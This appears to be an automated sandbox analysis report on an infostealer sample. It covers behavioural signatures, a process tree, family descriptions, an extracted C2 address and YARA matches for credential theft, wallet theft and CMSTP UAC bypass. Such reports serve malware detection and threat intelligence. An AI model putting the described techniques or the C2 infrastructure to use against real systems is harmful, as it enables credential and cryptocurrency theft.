Edit tour

Windows Analysis Report
TNQTc6Qmkg.exe

Overview

General Information

Sample name:	TNQTc6Qmkg.exe renamed because original name is a hash value
Original sample name:	fcac04fb67b3dec2db923867c5cb0701.exe
Analysis ID:	1432428
MD5:	fcac04fb67b3dec2db923867c5cb0701
SHA1:	56af848d85c781fd6ac0b8e11b2aec770fc4a105
SHA256:	df620b823687fa8371cb9e5a0dc17c483d804ef601757968b8666de2608d8ebb
Tags:	32exeStealc
Infos:

Detection

Mars Stealer, RedLine, SectopRAT, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected RedLine Stealer

Yara detected SectopRAT

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TNQTc6Qmkg.exe (PID: 4312 cmdline: "C:\Users\user\Desktop\TNQTc6Qmkg.exe" MD5: FCAC04FB67B3DEC2DB923867C5CB0701)

u3bs.0.exe (PID: 6808 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.0.exe" MD5: BB2810421305B969836433A1DFB11271)

cmd.exe (PID: 6240 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HDBKJEGIEB.exe (PID: 3004 cmdline: "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)

WerFault.exe (PID: 280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2360 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 6252 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 6164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u3bs.3.exe (PID: 3156 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

WerFault.exe (PID: 2256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392 MD5: C31336C1EFC2CCB44B4326EA793040F2)

chrome.exe (PID: 1816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://923204732243015979198396844819192998461207207524972816830460816/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

run.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 6176 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\bxhlahunbhc	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\bxhlahunbhc	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\bxhlahunbhc	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\osssciedmed	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\osssciedmed	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\osssciedmed	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u3bs.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001B.00000002.2968147762.0000000001427000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1650:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000000.2777480035.0000000000401000.00000020.00000001.01000000.00000012.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2778288110.000000000720D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: u3bs.0.exe PID: 6808	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u3bs.0.exe PID: 6808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u3bs.0.exe PID: 6808	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 5324	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 6252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 6252	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 6252	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 6164	JoeSecurity_SectopRAT	Yara detected SectopRAT	Joe Security
Process Memory Space: MSBuild.exe PID: 6164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: run.exe PID: 6612	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 6176	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 6176	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 6176	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 896	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.3.u3bs.0.exe.42d0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u3bs.0.exe.42d0000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.cmd.exe.5d800c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.u3bs.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u3bs.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.cmd.exe.5d800c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.u3bs.0.exe.42a0e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u3bs.0.exe.42a0e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.cmd.exe.5d800c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
5.2.run.exe.3c1a15b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.run.exe.3c1a15b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
1.2.u3bs.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u3bs.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.cmd.exe.5d800c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.cmd.exe.5d800c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.cmd.exe.5d800c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.3.u3bs.0.exe.42d0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u3bs.0.exe.42d0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.cmd.exe.57b4e64.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.57b4e64.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
6.2.cmd.exe.60b00c8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.cmd.exe.60b00c8.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.cmd.exe.60b00c8.8.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
13.2.run.exe.3ea215b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.3ea215b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
5.2.run.exe.3bd686d.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.run.exe.3bd686d.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
6.2.cmd.exe.60b00c8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.cmd.exe.60b00c8.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.cmd.exe.60b00c8.8.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.2.u3bs.0.exe.42a0e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u3bs.0.exe.42a0e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
6.2.cmd.exe.56bbe64.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.56bbe64.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
13.2.run.exe.3e5e86d.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.3e5e86d.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
27.2.MSBuild.exe.1370000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.2.MSBuild.exe.1370000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField
14.2.cmd.exe.5770976.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.5770976.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
13.2.run.exe.3ea2d5b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
